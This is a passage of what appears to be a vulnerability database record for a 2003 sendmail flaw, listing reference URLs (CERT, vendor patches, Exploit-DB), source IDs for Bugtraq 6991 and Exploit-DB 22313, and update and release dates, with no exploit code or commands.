url: | http://www.info.apple.com/usen/security/security_updates.html | Trust: 0.3 |
url: | http://ftp1.support.compaq.com/public/unix/v5.0a/t64v50ab17-c0031300-16884-es-20030211.readme | Trust: 0.3 |
url: | http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51b20-c0169800-16980-es-20030218.readme | Trust: 0.3 |
url: | http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51bb1-c0003900-16874-es-20030211.readme | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/22313 | Trust: 0.3 |
url: | http://www.cert.org/advisories/ca-2003-07.html | Trust: 0.3 |
url: | http://www.sendmail.org/8.12.8.html | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/22314 | Trust: 0.3 |
url: | http://www.sendmail.com | Trust: 0.3 |
url: | http://www.sendmail.org | Trust: 0.3 |
SOURCES
db: | BID | id: | 6991 |
db: | EXPLOIT-DB | id: | 22313 |
db: | EDBNET | id: | 44505 |
LAST UPDATE DATE
2022-07-27T09:23:53.267000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 6991 | date: | 2007-09-22T00:30:00 |
SOURCES RELEASE DATE
db: | BID | id: | 6991 | date: | 2003-03-02T00:00:00 |
db: | EXPLOIT-DB | id: | 22313 | date: | 2003-03-02T00:00:00 |
db: | EDBNET | id: | 44505 | date: | 2003-03-02T00:00:00 |